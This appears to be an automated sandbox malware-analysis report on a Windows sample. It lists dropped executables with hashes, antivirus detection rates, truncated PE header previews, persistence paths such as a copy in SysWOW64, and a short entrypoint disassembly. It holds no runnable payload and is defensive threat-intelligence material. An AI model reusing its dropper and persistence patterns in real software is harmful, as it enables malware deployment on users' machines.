Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 14%, Browse Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}.k...k...k..c.a..k..c.c.[k..c.b..k..I.W..k...5./.k...5./.k...5./.k.......k.......k...k..!k..@5./.k..@5./.k..E5o..k..@5./.k..Rich.k..........PE..L....}\|^.................V...........4.......p....@.......................................@.............................4...4...<....p.......................P...&..`...T...............................@............p.. ............................text....U.......V.................. ..`.rdata..t....p.......Z..............@..@.data....N..........................@....gfids.......`......................@..@.rsrc........p......................@..@.reloc...&...P...(..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\97B8.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	296448
Entropy (8bit):	5.050328510666205
Encrypted:	false
SSDEEP:	3072:SSU5qL+yxQWTfQTEaiTuScgJyjn8TUlOdsiDz17qYcWrxpzbgqruJ3fed:FU5qL+ILQ4nkhfiF7qYcuzbgwuJ2
MD5:	0C7CD5A32BF32320089D44DC1A2CB8A3
SHA1:	F5D6DBEECC9B6020A34811F5EF6310198288FFC2
SHA-256:	2B8D595D4763EE7AE46BF143F394FE9239D2A0D1A77DEA9D2F69CFB5E253C042
SHA-512:	2151614602A002EFEDD85E158F901BE5F145C75376E105A5B6071C89003294336583EC439A64C6DFA760D6709EE1CB5D6BC270355953B9390B2E19409C05099A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8f..\|...\|...\|...bU$.W...bU5.a...bU#.....[..y...\|.......bU*.}...bU4.}...bU1.}...Rich\|...........PE..L...MJO`.....................<w.............. ....@...........................w......y..........................................<.....v..............................!..................................@............ ...............................text............................... ..`.rdata....... ......................@..@.data.....s.. ......................@....rsrc.........v.....................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\AEFA.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	783872
Entropy (8bit):	6.576079323203091
Encrypted:	false
SSDEEP:	12288:WfZoHSPPvc9PU6ynVQQTUnAD5MRJSa7V7m3rjY:UrviAVvEC5CJSa7V7Srs
MD5:	F111EE7C9F26F50F9EFEEB6EF6C32A3C
SHA1:	B4239A2662A2835F8BFF098D0F0CBD4A51095144
SHA-256:	5F1E42B60BBB3EB1BB895C9A94886A775312F0AB8527B96187F9E084A08413B4
SHA-512:	973D51072EB6C4F18691E33B70187F34B7032A17AAD7575EFAC06A34009ADD3934A01261F9540FDF4A4F9429A4421E730DE947BE817C52D32FF95B83C711F04D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 49%, Browse Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p.O.p.O.p.O."hO.p.O."yO.p.O."oO.p.O...O.p.O.p.O.p.O."fO.p.O."xO.p.O."}O.p.ORich.p.O................PE..L...@._`.................0....?.....]........@....@...........................K.............................................\|X..<....pJ..............................A..............................xT..@............@..@............................text..../.......0.................. ..`.rdata.......@... ...4..............@..@.data.....>..`.......T..............@....wibobahr....`J......f..............@..@.rsrc........pJ......j..............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B729.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	1670200
Entropy (8bit):	7.977370313137816
Encrypted:	false
SSDEEP:	49152:vOgtnAdge/fTkxEBqzdrZi830nMWHfBfJZpN5e2v:W0AdlTgHdrgxMW//Jv
MD5:	2D6ECA88082C6ABCE764F8A54B9B9917
SHA1:	C461C6E6DA306986D9F853729C5ED03AF1EE325E
SHA-256:	F960B96C81F71D848A119D18AA4074ECAA71E39086A611F2DC637D579B9F6AFA
SHA-512:	DBAA8B1DFD1EE3E0F636C3D1CFB25A101B2148569DDFC2404A49BA0A9985D74963378FF56E2F0D2A3CB3C2DE5214F0F5E1F1E9A9B6B90B87660E2EFD837B23B7
Malicious:	false
Preview:	MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L......a.............................P:......@....@...........................;.....f.....@..................................@1.`....P1.x...........pc..............................................................................................DATA.....01............................`.ctors.......@1.....................@....rsrc...x....P1.....................@..@.text........P:.....................@........................................................................................................................................................................................................................................................................................................................A..x..{}.........y{.qx...

C:\Users\user\AppData\Local\Temp\BFF4.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	453632
Entropy (8bit):	5.066707207289782
Encrypted:	false
SSDEEP:	3072:hmDsLlCSV7TXJnlGsMbRA9Zjhdlzi/1eY5jHDdesUXztjqO4pHh8OMjKy23AF+Yz:wQLlCSVHxlvZ9ZjufjUDH4p2kYFhvBB
MD5:	11124BB02075AD2D9D750343B42F932A
SHA1:	9BEAA5B27E610A92DF153E4B5628E1804CAD2B20
SHA-256:	00E365FB7DA89657B15CA8B16273B3B30FE66DBBEDE7F52B678D2E37AF51FA19
SHA-512:	C92123280F5C696ACA446306512293DB636D9BD70D359C4EA1F416AB192B19BF0478590076C71D6E57E72D1FE6AAE9E365792B2F223FC83F09004933C2552B07
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 40%, Browse Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............q.O.q.O.q.O.#hO.q.O.#yO.q.O.#oO.q.O...O.q.O.q.O.q.O.#fO.q.O.#xO.q.O.#}O.q.ORich.q.O........PE..L....=K_.................(....?.....\........@....@...........................F..... ........................................W..<....pE. ............................A...............................S..@............@..D............................text....'.......(.................. ..`.rdata.......@... ...,..............@..@.data.....>..`.......L..............@....himav..r....`E......^..............@..@.rsrc... ....pE......b..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\D830.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	590848
Entropy (8bit):	6.732963553617895
Encrypted:	false
SSDEEP:	12288:wZ74qPWaSeXqN5GCJzSilgqJg38oOBPBLunnb:ygfG0ztlg938N0b
MD5:	27F38096E53A91C525B0700700CEE4C4
SHA1:	C9D8B68A4E0216A83C44D7208C2D79DA873A48A2
SHA-256:	A35A1FF0E7EF9F9DFFBDE98157E8FDF0AD0D2C1B081284ACB5CF29623AC79A4F
SHA-512:	64F26739100990230D01F787048EADD14B6DD424C09C815DB737D71CEE3D89D18ACD4F91DCAF0694592D296AA2387A065E41380A71AD4CCAF841C785112E7587
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^`.....D...D...D.ScD3..D.SrD...D.SdDf..D=.D...D...D...D.SmD...D.SsD...D.SvD...DRich...D........PE..L...l_.`......................{...................@..........................P\|................................................<....P{..............................................................\|..@............................................text............................... ..`.rdata.............................@..@.data.....s..........~..............@....rsrc........P{.....................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EC9F.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	330752
Entropy (8bit):	5.45617077734832
Encrypted:	false
SSDEEP:	3072:SnGkQLCCGWLvxbJnf1jnHDnoGxHs+0XCA1bPq1ET+3PIEVaD6WrxpzbgqruJ3fed:RkQLRzxhxnMHPbi1lgD6uzbgwuJ2
MD5:	7442C55E6C71DA88E75CEF4A0B4B62CC
SHA1:	EAA434559E15F68B30EAD68C7494551082FA96AC
SHA-256:	48B5308F95E1E9B41B2CD54BD38E11B3508FEC9C9B7B5726CBF608A61F1635A1
SHA-512:	FA306BCBB87509C05F9DFC1A27D9BA76D38CBD41766EF64448C606EF8231D7BAEB5FA974AFA4A2D761000203A8D539E5373E344FBD7905E68053D3F3E294A7FD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8f..\|...\|...\|...bU$.W...bU5.a...bU#.....[..y...\|.......bU*.}...bU4.}...bU1.}...Rich\|...........PE..L....QO`......................w.............. ....@..........................`x......M......................................L...<....`w..............................!..................................@............ ...............................text............................... ..`.rdata...~... ......................@..@.data.....s.........................@....rsrc........`w.....................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\rljdetbq.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\2B8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15172608
Entropy (8bit):	6.5362743595877895
Encrypted:	false
SSDEEP:	49152:n9CsgZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZea:nss
MD5:	4BDB6708809436720497DA3BEB566B13
SHA1:	CFB8E9547BB17FE55B2B4642DFCDEFC610E50E76
SHA-256:	9208374286845D0D5125D53211CBE0CE4D8A317A103F7FBDF0DE8CDC20325CE3
SHA-512:	779934AF2A9928B9958674AE8C231784DA48CAE3B4E36D0E8F1A914B3A11B1CD7D4887BCC6F4209978AB238C937FB49D224D6E73E8F6BC186C96AC31C3E8C518
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8f..\|...\|...\|...bU$.W...bU5.a...bU#.....[..y...\|.......bU*.}...bU4.}...bU1.}...Rich\|...........PE..L......`......................w.............. ....@..........................0x..............................................^..<....0w..............................!..............................xU..@............ ...............................text............................... ..`.rdata..dG... ...H..................@..@.data.....s..p.......V..............@....rsrc........0w.....................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001@` (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11002781241816798
Encrypted:	false
SSDEEP:	12:26XMXm/Ey6q9995NA0Rq3qQ10nMCldimE8eawHjcX:26Fl68oNLyMCldzE9BHjcX
MD5:	04ACF890620B455E3D8105F006EDC27D
SHA1:	C8990B66B7BC39A617B985EE031B42056CF048BF
SHA-256:	C280F7895D546EB10119F5BC171DA014D19E8FC01BAA9E09F5921DE83F232410
SHA-512:	4B144D9686F39D598B42A2E6E939D6D2B783A5C47C29D63345E2725C941124A70FB91B189D429291CBB3444B21C8E2E227C1B868C45B9605AD9ED388CCE226AC
Malicious:	false
Preview:	....................................................................................8......-.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................Cr.4...... .....LJ.Y............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....8...=!.-....................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11254562368410817
Encrypted:	false
SSDEEP:	12:LxXm/Ey6q9995NA0H1miM3qQ10nMCldimE8eawHza1miI4:Lcl68o21tMLyMCldzE9BHza1tI4
MD5:	E1602F0FC5E7DA52892D1B6DE410B9A9
SHA1:	070382E305B8CBB7BA784ED0C1682249074DB50F
SHA-256:	76E28ADA25C70D6B407A35AB53E4F19713833889FA782024489F6A70C747839B
SHA-512:	588D9A53C70BB03667B5E65072D6B714A23E53D3F037EA56A3AC831B876C274B4B80D2A40ED0488A704326E6B430557DF776541513CB568B9A86D351634B3A49
Malicious:	false
Preview:	....................................................................................8...s..-.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................Cr.4...... .......Y............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....8...4!.-....................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.. (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.1125133223520602
Encrypted:	false
SSDEEP:	12:QXm/Ey6q9995NA0H1mK2P3qQ10nMCldimE8eawHza1mKel/N:Bl68o21iPLyMCldzE9BHza16ll
MD5:	ADC67E7CB7FBEE4EC3A91C2EB164F74C
SHA1:	5E0C28A169D23141F9879BF613C3EE9F77BFEABE
SHA-256:	ECDCC2B8EE5017173B1300598BD62778321EE8A0652EB44B44CA06F5C581E286
SHA-512:	00047EE56DCF8DA14BFB5742F25E91391799A82A835C6485D84EEDF12C447C30E0E161F5D85FB1EF529BAEAC6536A297E950D2F59A8C3CAF7017DE70304FDB4D
Malicious:	false
Preview:	....................................................................................8...G.-.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................Cr.4...... .......Y............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....8.....-....................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\aiecibh Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	248375
Entropy (8bit):	7.99932134676986
Encrypted:	true
SSDEEP:	6144:jlDEgzRv7sFFsljkEGSyUgmcw9R71+DYXIL9+rOBk//:OgOFFUxyUg3w9RJ+cXA9QO23
MD5:	E951E36D628E972EEFC6E8F9A228F779
SHA1:	E8F02C131382238CC746BBCE7F87926AE4EB75C7
SHA-256:	2567504CD3D98FEEDD880F20112AAC17FAB800D112784FBD7A401D4BE263BC5E
SHA-512:	283052D2E1EE6F27D5CED2183E54A028B52C7044FF285DB59058529E11052FF183CA7353D1E00685218AAA44937B4E635750C96E75EC5FFAD56A27FFAFE81D59
Malicious:	false
Preview:	....x!....7n.:i.u6+8.v...C7.?...2<.G......a.Z..i.q`a..`M.U.....iv1.O....<_.a..B.F_.Db$...A.{...C.......N.^i...ZW...U.$.....<>`7._p......>Vx.........n...kb.....GY!......@+f..W.W.r...,.......G.(.b...M.....]f...^......PX7a]3\|.+...wfV<..%...z{..ep.U...@...}.[.............s..7&....Bh.......6;rzu.o.X)".......E.c...7......@@.....\|.BY.........m.[HIK.-.).e.-.5.0.S..[/ ....<.;.".802....N...H..l..5S.....MP...v.M..F'.....V.>.E...h.gbI.B3....2.(..d..^m...U....dW..K............L5}..}.2n4..'..Q..J...g..`I..._......./?..\U...].ER.}C.....+1...WrV..Q........Y..(\|]X.:.x_.2...5.>.S ....M_$...cS.....W.j=...AM.......-..V\|.{9Y..l......a....!.....,.....mk2.........8...=u9.=((.:[Rf.R.'.ct@.[F...7V....x.k...f...n..\..../\|).pQ}..:.\:/.S%.3[..uuS...HX?B..{5j.qv...o..^>.y..&..S..B.n.='.PnK...2.....=...8.......7%..J.n.........=.wF....no....).....y...>..$...%8s.F.HDF..=J..aI.....6{.....l...,..;.g'.J...!.A.....{P..)......I.[.\.'..,....J.8...@\.]....$,..f

C:\Users\user\AppData\Roaming\ecgujuh Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	358912
Entropy (8bit):	6.278717191933335
Encrypted:	false
SSDEEP:	6144:7e+RhbrOOFh9v2Y8zBk3L3gXO1RdFggj:7e6aOFhB8zBk3L3b1R
MD5:	1F935BFFF0F8128972BC69625E5B2A6C
SHA1:	18DB55C519BBE14311662A06FAEECC97566E2AFD
SHA-256:	2BFA0884B172C9EAFF7358741C164F571F0565389AB9CF99A8E0B90AE8AD914D
SHA-512:	2C94C1EA43B008CE164D7CD22A2D0FF3B60A623017007A2F361BDFF69ED72E97B0CC0897590BE9CC56333E014CD003786741EB6BB7887590CB2AAD832EA8A32D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k..S/.../.../...1.Z.=...1.L.W....6..*.../.......1.K.....1.[.....1.^.....Rich/...................PE..L...t..`.................<...J.......4.......P....@.................................A.......................................,9..<....0...Y.......................#..P...............................X...@............................................text...4:.......<.................. ..`.data...`....P.......@..............@....pamicak............................@....dos....K...........................@....modav..............................@....nugirof..... ......................@....rsrc....Y...0...Z..................@..@.reloc...>.......@...:..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\icgujuh Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	299008
Entropy (8bit):	5.045277904584397
Encrypted:	false
SSDEEP:	6144:Sgs+Lk1QNJlgD6g++0MGnyIh41uzbgwuJ2:SO8QNJlK6g++eh41unnb
MD5:	246B41453B996BFA14F60D4785E598AC
SHA1:	977B7D8CC4237CA4C8A2268AEDFFF4D83C7D0A86
SHA-256:	08A6DFEB7ADF5EB90703ABFAB6C1F24A9F93C79E6287213F695C44F0181644EC
SHA-512:	122FBF1CF7202AC0370471E5D1FAF19C3D211A75B7629221DAF0DD3C6A7C3260DB0FDC22DA7161DD53C9F646F2400DBDE80751139D20D1E0F977869B60224BD2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8f..\|...\|...\|...bU$.W...bU5.a...bU#.....[..y...\|.......bU*.}...bU4.}...bU1.}...Rich\|...................PE..L.....'`.....................Fw.............. ....@...........................w.................................................<.....v..............................!..................................@............ ...............................text............................... ..`.rdata..x.... ......................@..@.data.....s.. ......................@....rsrc.........v.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\icgujuh:Zone.Identifier Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	9062
Entropy (8bit):	3.163173589350838
Encrypted:	false
SSDEEP:	192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zv+Aw:j+s+v+b+P+m+0+Q+q+I+Aw
MD5:	7729BDBEA13C2EE69750A4387AC2EE4A
SHA1:	7BBD2DBC062960BED3D0E80DACAED0D0DDCCD2C1
SHA-256:	9E86E019CD04E4E5258336132EB4D9AA9A5405109B36257CF6F31875FE279CC9
SHA-512:	8D6CB796B06671E563B5DC5BEECB5E303648220E273EDFE86D1DD872A24072EBC21E05D69F260C62F07BC36312D65F74F08950474144E18408B1DF75BE66A354
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220110_024703_630.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.384186155989906
Encrypted:	false
SSDEEP:	96:0C3Po+ua5O+9M2YZWCJ/I2lrikp/4U1T2gYFzLUMCS6JReY5N:v/xLMS28E4CNr
MD5:	04471CB8A8BDEB374742B76FAA14CCC3
SHA1:	ED06FB7C9934B1AF8568CC8F3C4AF72C98439A30
SHA-256:	D9C6648892F479ED0E8E3A71C2EED55655EA00BF32F2E4083F00F742D42DE73B
SHA-512:	D8F967C79274AF4DE27816363C11B45820BF84A71C33E5EB56A5D7EF9195224A6EB734DD90BBFB3E7CE2C70FA4B0B8F775BB4A484AF7CE0DB47654E041EA20E1
Malicious:	false
Preview:	.... ... ....................................... ...!...........................p................................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... .....-QGY............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.0._.0.2.4.7.0.3._.6.3.0...e.t.l.........P.P.p...............................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\rhrovez\rljdetbq.exe (copy) Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15172608
Entropy (8bit):	6.5362743595877895
Encrypted:	false
SSDEEP:	49152:n9CsgZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZeZea:nss
MD5:	4BDB6708809436720497DA3BEB566B13
SHA1:	CFB8E9547BB17FE55B2B4642DFCDEFC610E50E76
SHA-256:	9208374286845D0D5125D53211CBE0CE4D8A317A103F7FBDF0DE8CDC20325CE3
SHA-512:	779934AF2A9928B9958674AE8C231784DA48CAE3B4E36D0E8F1A914B3A11B1CD7D4887BCC6F4209978AB238C937FB49D224D6E73E8F6BC186C96AC31C3E8C518
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8f..\|...\|...\|...bU$.W...bU5.a...bU#.....[..y...\|.......bU*.}...bU4.}...bU1.}...Rich\|...........PE..L......`......................w.............. ....@..........................0x..............................................^..<....0w..............................!..............................xU..@............ ...............................text............................... ..`.rdata..dG... ...H..................@..@.data.....s..p.......V..............@....rsrc........0w.....................@..@................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.045277904584397
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	cz2ZyeL2Zd.exe
File size:	299008
MD5:	246b41453b996bfa14f60d4785e598ac
SHA1:	977b7d8cc4237ca4c8a2268aedfff4d83c7d0a86
SHA256:	08a6dfeb7adf5eb90703abfab6c1f24a9f93c79e6287213f695c44f0181644ec
SHA512:	122fbf1cf7202ac0370471e5d1faf19c3d211a75b7629221daf0dd3c6a7c3260db0fdc22da7161dd53c9f646f2400dbde80751139d20d1e0f977869b60224bd2
SSDEEP:	6144:Sgs+Lk1QNJlgD6g++0MGnyIh41uzbgwuJ2:SO8QNJlK6g++eh41unnb
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8f..\|...\|...\|...bU$.W...bU5.a...bU#.....[...y...\|.......bU*.}...bU4.}...bU1.}...Rich\|...................PE..L.....'`...........

File Icon


Icon Hash:	bcfc36b6b694c6e2

Static PE Info

General
Entrypoint:	0x401eaf
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6027E1B6 [Sat Feb 13 14:27:02 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	09aef69c73de8322563f63d55badb1aa

Entrypoint Preview

Instruction
call 00007FF7BD41A741h
jmp 00007FF7BD4157EEh
int3
int3
int3
int3
int3
int3
int3
call 00007FF7BD4159ACh
xchg cl, ch
jmp 00007FF7BD415994h
call 00007FF7BD4159A3h
fxch st(0), st(1)
jmp 00007FF7BD41598Bh
fabs
fld1
mov ch, cl
xor cl, cl
jmp 00007FF7BD415981h
mov byte ptr [ebp-00000090h], FFFFFFFEh
fabs
fxch st(0), st(1)
fabs
fxch st(0), st(1)
fpatan
or cl, cl
je 00007FF7BD415976h
fldpi
fsubrp st(1), st(0)
or ch, ch
je 00007FF7BD415974h
fchs
ret
fabs
fld st(0), st(0)
fld st(0), st(0)
fld1
fsubrp st(1), st(0)
fxch st(0), st(1)
fld1
faddp st(1), st(0)
fmulp st(1), st(0)
ftst
wait
fstsw word ptr [ebp-000000A0h]
wait
test byte ptr [ebp-0000009Fh], 00000001h
jne 00007FF7BD415977h
xor ch, ch
fsqrt
ret
pop eax
jmp 00007FF7BD419EBFh
fstp st(0)
fld tbyte ptr [0043269Ah]
ret
fstp st(0)
or cl, cl
je 00007FF7BD41597Dh
fstp st(0)
fldpi
or ch, ch
je 00007FF7BD415974h
fchs
ret
fstp st(0)
fldz
or ch, ch
je 00007FF7BD415969h
fchs
ret
fstp st(0)
jmp 00007FF7BD419E95h
fstp st(0)
mov cl, ch
jmp 00007FF7BD415972h
call 00007FF7BD41593Eh
jmp 00007FF7BD419EA0h
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
add esp, 0000FD30h

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3131c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x276e000	0xfe00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
